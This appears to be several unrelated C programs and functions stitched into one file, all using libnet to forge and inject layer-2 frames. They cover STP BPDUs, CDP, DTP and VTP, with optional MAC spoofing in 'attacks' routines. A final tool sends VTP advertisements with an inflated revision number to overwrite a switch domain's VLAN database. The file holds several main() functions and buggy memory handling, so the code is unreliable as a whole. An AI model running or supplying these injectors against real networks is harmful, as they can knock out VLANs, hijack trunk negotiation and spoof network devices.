int
main(int argc, char *argv[])
{
int c, len, type;
libnet_t *l;
libnet_ptag_t t;
u_char *dst, *src;
u_char rootid[8], bridgeid[8];
char *device = NULL;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 packet shaping: [STP]\n");
device = NULL;
src = dst = NULL;
type = CONF;
while ((c = getopt(argc, argv, "cd:i:s:t")) != EOF)
{
switch (c)
{
case 'c':
type = CONF;
break;
case 'd':
dst = libnet_hex_aton(optarg, &len);
break;
case 'i':
device = optarg;
break;
case 's':
src = libnet_hex_aton(optarg, &len);
break;
case 't':
type = TCN;
break;
default:
usage(argv[0]);
exit(EXIT_FAILURE);
}
}
if (src == NULL || dst == NULL)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_LINK, /* injection type */
device, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
if (type == CONF)
{
rootid[0] = 0x80;
rootid[1] = 0x00;
rootid[2] = 0x00;
rootid[3] = 0x07;
rootid[4] = 0xec;
rootid[5] = 0xae;
rootid[6] = 0x30;
rootid[7] = 0x41;
bridgeid[0] = 0x80;
bridgeid[1] = 0x00;
bridgeid[2] = 0x00;
bridgeid[3] = 0x07;
bridgeid[4] = 0xec;
bridgeid[5] = 0xae;
bridgeid[6] = 0x30;
bridgeid[7] = 0x41;
t = libnet_build_stp_conf(
0x0000, /* protocol id */
0x00, /* protocol version */
0x00, /* BPDU type */
0x00, /* BPDU flags */
rootid, /* root id */
0x00000001, /* root path cost */
bridgeid, /* bridge id */
0x8002, /* port id */
0x00, /* message age */
0x0014, /* max age */
0x0002, /* hello time */
0x000f, /* forward delay */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build STP conf header: %s\n",
libnet_geterror(l));
goto bad;
}
}
else
{
t = libnet_build_stp_tcn(
0x0000, /* protocol id */
0x00, /* protocol version */
0x80, /* BPDU type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build STP tcn header: %s\n",
libnet_geterror(l));
goto bad;
}
}
t = libnet_build_802_2(
LIBNET_SAP_STP, /* DSAP */
LIBNET_SAP_STP, /* SSAP */
0x03, /* control */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n",
libnet_geterror(l));
goto bad;
}
t = libnet_build_802_3(
dst, /* ethernet destination */
src, /* ethernet source */
LIBNET_802_2_H + ((type == CONF) ? LIBNET_STP_CONF_H :
LIBNET_STP_TCN_H), /* frame size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n",
libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte STP packet; check the wire.\n", c);
}
free(dst);
free(src);
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
free(dst);
free(src);
libnet_destroy(l);
return (EXIT_FAILURE);
}
int8_t
vtp_send(struct attacks *attacks)
{
libnet_ptag_t t;
libnet_t *lhandler;
u_int32_t vtp_len=0, sent;
struct vtp_data *vtp_data;
struct vtp_summary *vtp_summ;
struct vtp_subset *vtp_subset;
struct vtp_request *vtp_request;
struct vtp_join *vtp_join;
u_int8_t *vtp_packet, *aux;
u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
dlist_t *p;
struct interface_data *iface_data;
struct interface_data *iface_data2;
vtp_data = attacks->data;
switch(vtp_data->code)
{
case VTP_SUMM_ADVERT:
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
break;
case VTP_SUBSET_ADVERT:
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset)+vtp_data->vlans_len;
break;
case VTP_REQUEST:
vtp_len = sizeof(cisco_data)+38;
break;
case VTP_JOIN:
vtp_len = sizeof(cisco_data)+40+126;
break;
default:
vtp_len = sizeof(cisco_data)+30;
break;
}
vtp_packet = calloc(1,vtp_len);
if (vtp_packet == NULL)
{
thread_error("vtp_send calloc error",errno);
return -1;
}
aux = vtp_packet;
memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);
switch(vtp_data->code)
{
case VTP_SUMM_ADVERT:
vtp_summ = (struct vtp_summary *)aux;
vtp_summ->version = vtp_data->version;
vtp_summ->code = vtp_data->code;
vtp_summ->followers = vtp_data->followers;
if (vtp_data->dom_len > VTP_DOMAIN_SIZE)
{
vtp_summ->dom_len = VTP_DOMAIN_SIZE;
memcpy(vtp_summ->domain,vtp_data->domain,VTP_DOMAIN_SIZE);
}
else
{
vtp_summ->dom_len = vtp_data->dom_len;
memcpy(vtp_summ->domain,vtp_data->domain,vtp_data->dom_len);
}
vtp_summ->revision = htonl(vtp_data->revision);
vtp_summ->updater = htonl(vtp_data->updater);
memcpy(vtp_summ->timestamp,vtp_data->timestamp,VTP_TIMESTAMP_SIZE);
memcpy(vtp_summ->md5,vtp_data->md5,16);
break;
case VTP_SUBSET_ADVERT:
vtp_subset = (struct vtp_subset *)aux;
vtp_subset->version = vtp_data->version;
vtp_subset->code = vtp_data->code;
vtp_subset->seq = vtp_data->seq;
if (vtp_data->dom_len > VTP_DOMAIN_SIZE)
{
vtp_subset->dom_len = VTP_DOMAIN_SIZE;
memcpy(vtp_subset->domain,vtp_data->domain,VTP_DOMAIN_SIZE);
}
else
{
vtp_subset->dom_len = vtp_data->dom_len;
memcpy(vtp_subset->domain,vtp_data->domain,vtp_data->dom_len);
}
vtp_subset->revision = htonl(vtp_data->revision);
if (vtp_data->vlans_len)
memcpy((vtp_subset+1),vtp_data->vlan_info,vtp_data->vlans_len);
break;
case VTP_REQUEST:
vtp_request = (struct vtp_request *)aux;
vtp_request->version = vtp_data->version;
vtp_request->code = vtp_data->code;
vtp_request->reserved = 0;
if (vtp_data->dom_len > VTP_DOMAIN_SIZE)
{
vtp_request->dom_len = VTP_DOMAIN_SIZE;
memcpy(vtp_request->domain,vtp_data->domain,VTP_DOMAIN_SIZE);
}
else
{
vtp_request->dom_len = vtp_data->dom_len;
memcpy(vtp_request->domain,vtp_data->domain,vtp_data->dom_len);
}
vtp_request->start_val = htons(vtp_data->start_val);
break;
case VTP_JOIN:
vtp_join = (struct vtp_join *)aux;
vtp_join->version = vtp_data->version;
vtp_join->code = vtp_data->code;
vtp_join->maybe_reserved = 0;
if (vtp_data->dom_len > VTP_DOMAIN_SIZE)
{
vtp_join->dom_len = VTP_DOMAIN_SIZE;
memcpy(vtp_join->domain,vtp_data->domain,VTP_DOMAIN_SIZE);
}
else
{
vtp_join->dom_len = vtp_data->dom_len;
memcpy(vtp_join->domain,vtp_data->domain,vtp_data->dom_len);
}
vtp_join->vlan = htonl(0x000003ef);
vtp_join->unknown[0] = 0x40;
break;
default:
aux[0]=vtp_data->version;
aux[1]=vtp_data->code;
break;
}
for (p = attacks->used_ints->list; p; p = dlist_next(attacks->used_ints->list, p)) {
iface_data = (struct interface_data *) dlist_data(p);
lhandler = iface_data->libnet_handler;
t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
vtp_packet, /* payload */
vtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build ethernet header",lhandler);
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
t = libnet_build_802_3(
vtp_data->mac_dest, /* ethernet destination */
(attacks->mac_spoofing) ? vtp_data->mac_source : iface_data->etheraddr,
/* ethernet source */
LIBNET_802_2_H + vtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build ethernet header",lhandler);
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
/*
* Write it to the wire.
*/
sent = libnet_write(lhandler);
if (sent == -1) {
thread_libnet_error("libnet_write error", lhandler);
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
libnet_clear_packet(lhandler);
protocols[PROTO_VTP].packets_out++;
iface_data2 = interfaces_get_struct(iface_data->ifname);
iface_data2->packets_out[PROTO_VTP]++;
}
free(vtp_packet);
return 0;
}
int
main(int argc, char *argv[])
{
int c, len, index;
libnet_t *l;
libnet_ptag_t t;
u_char *value;
u_char values[100];
u_short tmp;
char errbuf[LIBNET_ERRBUF_SIZE];
u_int8_t oui[3] = { 0x00, 0x00, 0x0c };
u_int8_t cdp_mac[6] = {0x01, 0x0, 0xc, 0xcc, 0xcc, 0xcc};
if (argc != 3)
{
fprintf(stderr, "usage %s device device-id\n", argv[0]);
return (EXIT_FAILURE);
}
fprintf(stderr, "cdppoke...\n");
l = libnet_init(LIBNET_LINK, argv[1], errbuf);
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
return (EXIT_FAILURE);
}
/* build the TLV's by hand until we get something better */
memset(values, 0, sizeof(values));
index = 0;
tmp = htons(LIBNET_CDP_VERSION);
memcpy(values, &tmp, 2);
index += 2;
tmp = htons(9); /* length of string below plus type and length fields */
memcpy(values + index, &tmp, 2);
index += 2;
memcpy(values + index, (u_char *)"1.1.1", 5);
index += 5;
/* this TLV is handled by the libnet builder */
value = argv[2];
len = strlen(argv[2]);
/* build CDP header */
t = libnet_build_cdp(
1, /* version */
30, /* time to live */
0x0, /* checksum */
0x1, /* type */
len, /* length */
value, /* value */
values, /* payload */
index, /* payload size */
l, /* libnet context */
0); /* libnet ptag */
if (t == -1)
{
fprintf(stderr, "Can't build CDP header: %s\n", libnet_geterror(l));
goto bad;
}
/* build 802.2 header */
t = libnet_build_802_2snap(
LIBNET_SAP_SNAP, /* SAP SNAP code */
LIBNET_SAP_SNAP, /* SAP SNAP code */
0x03, /* control */
oui, /* OUI */
0x2000, /* upper layer protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet context */
0); /* libnet ptag */
if (t == -1)
{
fprintf(stderr, "Can't build SNAP header: %s\n", libnet_geterror(l));
goto bad;
}
/* build 802.3 header */
t = libnet_build_802_3(
cdp_mac, /* ethernet destination */
(u_int8_t *)libnet_get_hwaddr(l), /* ethernet source */
LIBNET_802_2_H + LIBNET_802_2SNAP_H + LIBNET_CDP_H, /* packet len */
NULL, /* payload */
0, /* payload size */
l, /* libnet context */
0); /* libnet ptag */
if (t == -1)
{
fprintf(stderr, "Can't build 802.3 header: %s\n", libnet_geterror(l));
goto bad;
}
/* write the packet out */
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte CDP frame \"%s\"\n", c, argv[2]);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int8_t
dtp_send(struct attacks *attacks)
{
libnet_ptag_t t;
libnet_t *lhandler;
u_int32_t dtp_len, sent;
struct dtp_data *dtp_data;
u_int8_t *dtp_packet, *aux;
u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x04 };
dlist_t *p;
struct interface_data *iface_data;
struct interface_data *iface_data2;
dtp_data = attacks->data;
dtp_len = sizeof(cisco_data)+dtp_data->dom_len+26;
dtp_packet = calloc(1,dtp_len);
if (dtp_packet == NULL)
{
thread_error("dtp_send calloc error",errno);
return -1;
}
aux = dtp_packet;
memcpy(dtp_packet,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);
*aux = dtp_data->version;
aux++; aux++;
*aux = DTP_TYPE_DOMAIN;
aux++; aux++;
*aux = dtp_data->dom_len+5;
aux++;
memcpy(aux,dtp_data->domain,dtp_data->dom_len);
aux+=dtp_data->dom_len;
aux++; aux++;
*aux = DTP_TYPE_STATUS; aux++; aux++;
*aux = 0x05; aux++;
*aux = dtp_data->status;
aux++; aux++;
*aux = DTP_TYPE_TYPE; aux++; aux++;
*aux = 0x05; aux++;
*aux = dtp_data->type;
aux++; aux++;
*aux = DTP_TYPE_NEIGHBOR; aux++; aux++;
*aux = 0x0a; aux++;
memcpy(aux,dtp_data->neighbor,ETHER_ADDR_LEN);
for (p = attacks->used_ints->list; p; p = dlist_next(attacks->used_ints->list, p)) {
iface_data = (struct interface_data *) dlist_data(p);
lhandler = iface_data->libnet_handler;
t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
dtp_packet, /* payload */
dtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build ethernet header",lhandler);
libnet_clear_packet(lhandler);
free(dtp_packet);
return -1;
}
t = libnet_build_802_3(
dtp_data->mac_dest, /* ethernet destination */
(attacks->mac_spoofing) ? dtp_data->mac_source : iface_data->etheraddr,
/* ethernet source */
LIBNET_802_2_H + dtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build ethernet header",lhandler);
libnet_clear_packet(lhandler);
free(dtp_packet);
return -1;
}
/*
* Write it to the wire.
*/
sent = libnet_write(lhandler);
if (sent == -1) {
thread_libnet_error("libnet_write error", lhandler);
libnet_clear_packet(lhandler);
free(dtp_packet);
return -1;
}
libnet_clear_packet(lhandler);
protocols[PROTO_DTP].packets_out++;
iface_data2 = interfaces_get_struct(iface_data->ifname);
iface_data2->packets_out[PROTO_DTP]++;
}
free(dtp_packet);
return 0;
}
int main( int argc, char *argv[] )
{
int opt,k=0;
extern char *optarg;
libnet_ptag_t t;
libnet_t *lhandler;
u_int32_t vtp_len=0, sent;
struct vtp_summary *vtp_summ;
struct vtp_subset *vtp_sub;
u_int8_t *vtp_packet,*vtp_packet2, *aux;
u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };
u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00, 0x00,0x00 };
struct libnet_ether_addr *mymac;
char *device;
char error_information[LIBNET_ERRBUF_SIZE];
char *domain;
// get options
while ((opt = getopt(argc, argv, "i:d:")) != -1)
{
switch (opt) {
case 'i':
device=malloc(strlen(optarg));
strcpy(device,optarg);
k=1;
break;
case 'd':
domain=malloc(strlen(optarg));
strcpy(domain,optarg);
break;
default: usage(argv[0]);
}
}
if(!k) { printf(" %s -i <interface> -d <vtp domain>\n must assign the interface\n",argv[0]);exit(1);}
//init libnet
lhandler=libnet_init(LIBNET_LINK,device,error_information);
if (!lhandler) {
fprintf(stderr, "libnet_init: %s\n", error_information);
return -1;
}
mymac=libnet_get_hwaddr(lhandler);
//build the first packet for vtp_summary
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
vtp_packet = calloc(1,vtp_len);
aux = vtp_packet;
memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);
vtp_summ = (struct vtp_summary *)aux;
vtp_summ->version = 0x01;
vtp_summ->code = 0x01;//vtp_summary
vtp_summ->followers = 0x01;
vtp_summ->dom_len = strlen(domain);
memcpy(vtp_summ->domain,domain,strlen(domain));
vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok
t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
vtp_packet, /* payload */
vtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
t = libnet_build_802_3(
dst_mac, /* ethernet destination */
mymac->ether_addr_octet, /* ethernet source */
LIBNET_802_2_H + vtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
sent = libnet_write(lhandler);
if (sent == -1) {
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
libnet_clear_packet(lhandler);
//build the second vtp packet for vtp_subset
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);
vtp_packet2 = calloc(1,vtp_len);
aux = vtp_packet2;
memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);
vtp_sub = (struct vtp_subset *)aux;
vtp_sub->version = 0x01;
vtp_sub->code = 0x02; //vtp_subset
vtp_sub->seq = 0x01;
vtp_sub->dom_len = strlen(domain);
memcpy(vtp_sub->domain,domain,strlen(domain));
vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok
// memcpy(vtp_sub->aaa,aaa,strlen(aaa));
t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
vtp_packet2, /* payload */
vtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
t = libnet_build_802_3(
dst_mac, /* ethernet destination */
mymac->ether_addr_octet, /* ethernet source */
LIBNET_802_2_H + vtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
sent = libnet_write(lhandler);
if (sent == -1) {
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
libnet_clear_packet(lhandler);
}
